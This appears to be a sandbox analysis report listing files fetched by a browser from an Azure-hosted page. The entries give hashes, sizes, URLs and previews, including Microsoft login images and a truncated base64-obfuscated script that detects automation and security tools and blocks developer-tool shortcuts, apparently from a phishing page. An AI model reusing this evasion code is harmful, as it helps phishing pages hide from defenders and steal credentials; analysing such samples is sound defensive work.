                                Entropy (8bit):6.00478230385501
                                Encrypted:false
                                SSDEEP:6144:lrna/Rpjo1VouhmNHJiLIUErXCrQjMPJbBI0DI1Lgds1yvGMT/Hy:69o1VoKIUEDC00BI0DImeMTPy
                                MD5:4744096E4F8B2C7A781B8E2BF6530940
                                SHA1:AEE8FC45EE31C42B7CD5C1D8152B3FE05F52302D
                                SHA-256:534EC80B3BD8F93355B55B2BAC51F72DE09388732B1518BFD1106D65EF598C77
                                SHA-512:BCA142BB5E5E5B633F741E1E93E7A56D2220DD9571D93848DDCA4825097204163A14C880E6D47ECF5ADDC3CA1065A97FC6B6E043A05C8AF35C30A1F6B148F086
                                Malicious:false
                                Reputation:low
                                URL:https://8734873478934795494.z9.web.core.windows.net/
                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">.</head>.<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>.<script>.jyHNbDJLmS = atob;.gXlNekNrnY = "KCgpID0+IHsKICBpZiAoCiAgICBuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8CiAgICB3aW5kb3cuY2FsbFBoYW50b20gfHwKICAgIHdpbmRvdy5fcGhhbnRvbSB8fAogICAgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpCiAgKSB7CiAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJhYm91dDpibGFuayI7CiAgICByZXR1cm47CiAgfQoKICBjb25zdCBwSENjS0ljTENFID0gWwogICAgeyBjb2RlOiAxMjMgfSwKICAgIHsgY29kZTogODUsIGN0cmw6IHRydWUgfSwKICAgIHsgY29kZTogNzMsIGN0cmw6IHRydWUsIHNoaWZ0OiB0cnVlIH0sCiAgICB7IGNvZGU6IDY3LCBjdHJsOiB0cnVlLCBzaGlmdDogdHJ1ZSB9LAogICAgeyBjb2RlOiA3NCwgY3RybDogdHJ1ZSwgc2hpZnQ6IHRydWUgfSwKICAgIHsgY29kZTogNzUsIGN0cmw6IHRydWUsIHNoaWZ0OiB0cnVlIH0sCiAgICB7IGNvZGU6IDcyLCBjdHJsOiB0cnVlIH0sCiAgICB7IGNvZGU6IDczLCBtZXRhOiB0cnVlLCBhbHQ6IHRydWUgfSwKICAgIHsgY29kZTogNjcsIG1ldGE6IHRydWUsIGFsdDogdHJ1ZSB9LAogICAgeyBjb2RlOiA4NSwgbWV0YTogdHJ1ZSB9CiAgXTsKCiAgY
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                Category:dropped
                                Size (bytes):2407
                                Entropy (8bit):7.900400471609788
                                Encrypted:false
                                SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                Malicious:false
                                Reputation:low
                                Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (10017)
                                Category:downloaded
                                Size (bytes):10245
                                Entropy (8bit):5.437589264532084
                                Encrypted:false
                                SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                Malicious:false
                                Reputation:low
                                URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250428T043316Z&X-Amz-Expires=300&X-Amz-Signature=8fe791c6996e8d5e875950a19d9b3faaa40e1be3463695fd29b4215c33745969&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 270
                                Category:downloaded
                                Size (bytes):190
                                Entropy (8bit):6.864386660871438
                                Encrypted:false
                                SSDEEP:3:FttwDcyj0iAIW7CiH4P7WxW87y4CC8lrkBzvsPECVpGOoAqwcMl9Xd6/zEk/:XtwDDP30rH4Pyxy4j8lrUvTUf3cwmN/
                                MD5:AE9FBF7DA7492B12D4A3E8E016661379
                                SHA1:4348F5D88E575FFA9CA6DF4326DB86CBFE437252
                                SHA-256:3E1AA58732ED06C27F36460506AE841719F7D873AB6215F6A29ACE2144EFED32
                                SHA-512:D1D28CC62F8E7E91C274719013D5AE695D1E3E45F7BEF1D4CFDECEC936C6C961427B2E40C317E381158D9F063DDE96310641352A481DEBC8C9CB06E4316A6647
                                Malicious:false
                                Reputation:low
                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg
                                Preview:..........u....0.._e.W.u#b0...7..-A .a<...7.&...O..tl}.C0.....1F.K>.P.(..X..r......m..m....d.J..&O.m..,.-6.g{..[......`A4zj...k.OEUHUH.K..E.ib..e...#/.."...$...1.3..'.....7.7"......
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                Category:dropped
                                Size (bytes):1435
                                Entropy (8bit):7.8613342322590265
                                Encrypted:false
                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                Malicious:false
                                Reputation:low
                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                Category:downloaded
                                Size (bytes):1173
                                Entropy (8bit):7.811199816788843
                                Encrypted:false
                                SSDEEP:24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
                                MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                Malicious:false
                                Reputation:low
                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg
                                Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:downloaded
                                Size (bytes):76
                                Entropy (8bit):4.480772743393611
                                Encrypted:false
                                SSDEEP:3:xPW1skF0NuiQMnumOPdQMnumOY:xPWmJumOPxumOY
                                MD5:DD582438842BFEC5738763B362892E9B
                                SHA1:253A5936BF86383740481633CEEF867953E4F3A4
                                SHA-256:F790C80F83D44B46144F1EEEB28AC596CADC36BBA1249D1C2D2B8C132AAA92DE
                                SHA-512:00073DBC41DBCA191A0F81F30FB35791F25F04A26D43B12F4DFB592E38E8C08E74B30842F86B66C41E76E0353AECD5F065B75FA387B71521FE1D7394483575FD
                                Malicious:false
                                Reputation:low
                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhI8CUBqND-Mxn71EgUNzyMq_xIFDcWTxCQSBQ2JpWfLEgUNwxk5kBIFDYmlZ8sSBQ3DGTmQIaA9OdmR9WG6?alt=proto
                                Preview:CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw2JpWfLGgAKBw3DGTmQGgA=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                Category:dropped
                                Size (bytes):1173
                                Entropy (8bit):7.811199816788843
                                Encrypted:false
                                SSDEEP:24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
                                MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                Malicious:false
                                Reputation:low
                                Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                Category:dropped
                                Size (bytes):276
                                Entropy (8bit):7.316609873335077
                                Encrypted:false
                                SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                Malicious:false
                                Reputation:low
                                Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (63220)
                                Category:downloaded
                                Size (bytes):391039
                                Entropy (8bit):6.00478230385501
                                Encrypted:false
                                SSDEEP:6144:lrna/Rpjo1VouhmNHJiLIUErXCrQjMPJbBI0DI1Lgds1yvGMT/Hy:69o1VoKIUEDC00BI0DImeMTPy
                                MD5:4744096E4F8B2C7A781B8E2BF6530940
                                SHA1:AEE8FC45EE31C42B7CD5C1D8152B3FE05F52302D
                                SHA-256:534EC80B3BD8F93355B55B2BAC51F72DE09388732B1518BFD1106D65EF598C77
                                SHA-512:BCA142BB5E5E5B633F741E1E93E7A56D2220DD9571D93848DDCA4825097204163A14C880E6D47ECF5ADDC3CA1065A97FC6B6E043A05C8AF35C30A1F6B148F086
                                Malicious:false
                                Reputation:low
                                URL:https://8734873478934795494.z9.web.core.windows.net/favicon.ico
                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">.</head>.<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>.<script>.jyHNbDJLmS = atob;.gXlNekNrnY = "KCgpID0+IHsKICBpZiAoCiAgICBuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8CiAgICB3aW5kb3cuY2FsbFBoYW50b20gfHwKICAgIHdpbmRvdy5fcGhhbnRvbSB8fAogICAgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpCiAgKSB7CiAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJhYm91dDpibGFuayI7CiAgICByZXR1cm47CiAgfQoKICBjb25zdCBwSENjS0ljTENFID0gWwogICAgeyBjb2RlOiAxMjMgfSwKICAgIHsgY29kZTogODUsIGN0cmw6IHRydWUgfSwKICAgIHsgY29kZTogNzMsIGN0cmw6IHRydWUsIHNoaWZ0OiB0cnVlIH0sCiAgICB7IGNvZGU6IDY3LCBjdHJsOiB0cnVlLCBzaGlmdDogdHJ1ZSB9LAogICAgeyBjb2RlOiA3NCwgY3RybDogdHJ1ZSwgc2hpZnQ6IHRydWUgfSwKICAgIHsgY29kZTogNzUsIGN0cmw6IHRydWUsIHNoaWZ0OiB0cnVlIH0sCiAgICB7IGNvZGU6IDcyLCBjdHJsOiB0cnVlIH0sCiAgICB7IGNvZGU6IDczLCBtZXRhOiB0cnVlLCBhbHQ6IHRydWUgfSwKICAgIHsgY29kZTogNjcsIG1ldGE6IHRydWUsIGFsdDogdHJ1ZSB9LAogICAgeyBjb2RlOiA4NSwgbWV0YTogdHJ1ZSB9CiAgXTsKCiAgY
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 270
                                Category:dropped
                                Size (bytes):190
                                Entropy (8bit):6.864386660871438
                                Encrypted:false
                                SSDEEP:3:FttwDcyj0iAIW7CiH4P7WxW87y4CC8lrkBzvsPECVpGOoAqwcMl9Xd6/zEk/:XtwDDP30rH4Pyxy4j8lrUvTUf3cwmN/
                                MD5:AE9FBF7DA7492B12D4A3E8E016661379
                                SHA1:4348F5D88E575FFA9CA6DF4326DB86CBFE437252
                                SHA-256:3E1AA58732ED06C27F36460506AE841719F7D873AB6215F6A29ACE2144EFED32
                                SHA-512:D1D28CC62F8E7E91C274719013D5AE695D1E3E45F7BEF1D4CFDECEC936C6C961427B2E40C317E381158D9F063DDE96310641352A481DEBC8C9CB06E4316A6647
                                Malicious:false
                                Reputation:low
                                Preview:..........u....0.._e.W.u#b0...7..-A .a<...7.&...O..tl}.C0.....1F.K>.P.(..X..r......m..m....d.J..&O.m..,.-6.g{..[......`A4zj...k.OEUHUH.K..E.ib..e...#/.."...$...1.3..'.....7.7"......
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                Category:downloaded
                                Size (bytes):276
                                Entropy (8bit):7.316609873335077
                                Encrypted:false
                                SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                Malicious:false
                                Reputation:low
                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.svg
                                Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                Category:downloaded
                                Size (bytes):48316
                                Entropy (8bit):5.6346993394709
                                Encrypted:false
                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                MD5:2CA03AD87885AB983541092B87ADB299
                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                Malicious:false
                                Reputation:low
                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                Category:downloaded
                                Size (bytes):1435
                                Entropy (8bit):7.8613342322590265
                                Encrypted:false
                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                Malicious:false
                                Reputation:low
                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                Category:dropped
                                Size (bytes):621
                                Entropy (8bit):7.673946009263606
                                Encrypted:false
                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                MD5:4761405717E938D7E7400BB15715DB1E
                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                Malicious:false
                                Reputation:low
                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 268
                                Category:dropped
                                Size (bytes):212
                                Entropy (8bit):6.892082645537822
                                Encrypted:false
                                SSDEEP:3:FttopwiSNEzt0vWMxcpwkliLMeCakCL3MdQVRr1gOc7msRjLkn4kRNA+sCk3k1SE:XttNEHqsiqCL8dGRli1Rj/kg+83ZE
                                MD5:A454145E295493362D21BBD2C0681505
                                SHA1:B1811BBE70070D200C413B105FCB6DEE77D3BB8C
                                SHA-256:34BA4E54107E71C7BF7FE7F5820AE4B76E8EF39022C1BE88D439799619F117AB
                                SHA-512:49AD111C0A0E159C7B8D3500252BEB87401CBAC006FBE16B47290C388D2947E87F195743F5A84669BA09B5ABCA0ED8FABACA3E0FD88BDED5BE6067A17CEF8E83
                                Malicious:false
                                Reputation:low
                                Preview:..........u.1o.!.....+...TpC...5C........V../.S........<F..Ns.<......j.r......8..B)pt....D..../....C...2M.?...x.).._...;OS..2G.z.;Sb.....5.u'.6......h.;Ys....~m#.A........4.........../..a.5s}...I.vC....
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:downloaded
                                Size (bytes):89501
                                Entropy (8bit):5.289893677458563
                                Encrypted:false
